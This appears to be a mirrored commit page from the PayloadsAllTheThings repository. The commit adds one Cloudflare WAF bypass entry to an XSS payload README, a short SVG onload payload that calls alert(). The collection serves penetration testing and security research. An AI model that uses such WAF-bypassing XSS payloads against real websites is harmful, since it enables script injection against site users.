mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 14:52:53 +00:00
Update README.md
Added Cloudflare XSS bypass
This commit is contained in:
parent
bd9378cab7
commit
4b38516e3b
1 changed files with 6 additions and 0 deletions
|
@ -817,6 +817,12 @@ Works for CSP like `script-src self`
|
||||||
|
|
||||||
## Common WAF Bypass
|
## Common WAF Bypass
|
||||||
|
|
||||||
|
### Cloudflare XSS Bypass - 22nd march 2019 (by @RakeshMane10)
|
||||||
|
|
||||||
|
```
|
||||||
|
<svg/onload=alert()//
|
||||||
|
```
|
||||||
|
|
||||||
### Cloudflare XSS Bypass - 27th february 2018
|
### Cloudflare XSS Bypass - 27th february 2018
|
||||||
|
|
||||||
```html
|
```html
|
||||||
|
|
Loading…
Reference in a new issue